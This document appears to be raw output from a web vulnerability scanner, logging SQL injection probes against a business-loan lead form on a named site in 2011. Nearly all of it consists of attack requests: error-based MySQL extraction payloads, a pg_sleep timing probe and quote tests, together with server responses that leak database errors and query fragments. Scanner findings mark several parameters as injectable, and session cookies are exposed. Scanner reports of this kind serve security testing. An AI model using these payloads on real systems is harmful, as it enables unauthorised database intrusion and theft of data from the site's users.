OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:17 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '[]=2806__Business expansion&attributeId_433=2815__0-6 months (Start-up)&attribut' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start''&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:18 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_432%5B%5D parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_432%5B%5D parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:36 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'months (Start-up)&attributeId_434=2821__No - Clean Credit&attributeId_435=2824__' at line 5
The attributeId_432%5B%5D parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_432%5B%5D parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion'&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'months (Start-up)&attributeId_434=2821__No - Clean Credit&attributeId_435=2824__' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion''&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:20 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_433 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_433 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)'&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:22 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Credit&attributeId_435=2824__$0 revenue - start-up&attributeId_436=2832__ $10,00' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)''&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:23 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_433 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_433 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:46 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'Credit&attributeId_435=2824__$0 revenue - start-up&attributeId_436=2832__ $10,00' at line 5
The attributeId_434 parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the attributeId_434 parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 02:22:50 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 8326
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... rcard&attributeId_529=SELECT pg_sleep(25)--&button3=Submit&companyname=Company Name&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'revenue - start-up&attributeId_436=2832__ $10,000 - 49,999&attributeId_437=2840_' at line 5
The attributeId_434 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_434 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit'&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 1
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 10118
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]... (97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))+'&emailaddress=Email&firstname=First Name&lastname=Last Name&phone=Phone&subcategoryId=30005&website=n/a&zip=Zip code/'You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'revenue - start-up&attributeId_436=2832__ $10,000 - 49,999&attributeId_437=2840_' at line 5
Request 2
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit''&attributeId_435=2824__%240+revenue+-+start-up&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: PHPSESSID=i7f641pvk1hfe6f24pkvt4t2c2; JSESSIONID=C8713ADC0C7A46ACE1334F3EB9B50C37; OAID=029085b33b46dc8b68c77befe6006461; OAVARS[a08b960a]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A1%3A%226%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%222%22%3Bs%3A6%3A%22oadest%22%3Bs%3A38%3A%22http%3A%2F%2Fwww.insideup.com%2Fadvertise.html%22%3B%7D; OAVARS[a750dce4]=a%3A3%3A%7Bs%3A8%3A%22bannerid%22%3Bs%3A2%3A%2227%22%3Bs%3A6%3A%22zoneid%22%3Bs%3A1%3A%223%22%3Bs%3A6%3A%22oadest%22%3Bs%3A39%3A%22http%3A%2F%2Fwww.insideup.com%2Fhowitworks.html%22%3B%7D Accept-Encoding: gzip, deflate Proxy-Connection: Keep-Alive
Response 2
HTTP/1.1 200 OK Date: Mon, 14 Mar 2011 01:42:26 GMT Server: Apache/2.2.9 (Fedora) X-Powered-By: PHP/5.2.6 P3P: CP="IDC DSP COR ADM DEVi TAIi PSA PSD IVAi IVDi CONi HIS OUR IND CNT" Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 9941
select prj.catId,prj.groupId,grps.group_name,prj.templateId,prj.project_page_url from lead_flow_one_pages_details prj left join sub_category cats on cats.sub_category_id = prj.catId left join lea ...[SNIP]...
The attributeId_435 parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the attributeId_435 parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The database appears to be MySQL.
Request 1
GET /ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc&address=Address&attributeId_342_g=2017__Accounting%2fFinance&attributeId_343_g=2009__1-9&attributeId_344_g=2041__Advertising%2fMarketing%2fPR&attributeId_429=2785__Business+loan&attributeId_430=2792__%2415%2c000+-+24%2c999&attributeId_431=2801__A+business+that+I+am+about+to+start&attributeId_432%5B%5D=2806__Business+expansion&attributeId_433=2815__0-6+months+(Start-up)&attributeId_434=2821__No+-+Clean+Credit&attributeId_435=2824__%240+revenue+-+start-up'&attributeId_436=2832__+%2410%2c000+-+49%2c999&attributeId_437=2840__Yes&attributeId_438=2844__No+-+we+do+not+accept+Visa+or+Mastercard&attributeId_529=3407__+%240+-+%245%2c000&button3=Submit&companyname='%2B(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1))%2B'&emailaddress=Email&firstname=First+Name&lastname=Last+Name&phone=Phone&subcategoryId=30005&website=n%2fa&zip=Zip+code HTTP/1.1 Referer: http://www.insideup.com/ppc/leadflow/bulo00/project.php?catId=30005&iusrc=iupsc User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; Hoyt LLC Research - Crawler Fingerprinting Operations) Cache-Control: no-cache Host: www.insideup.com Cookie: 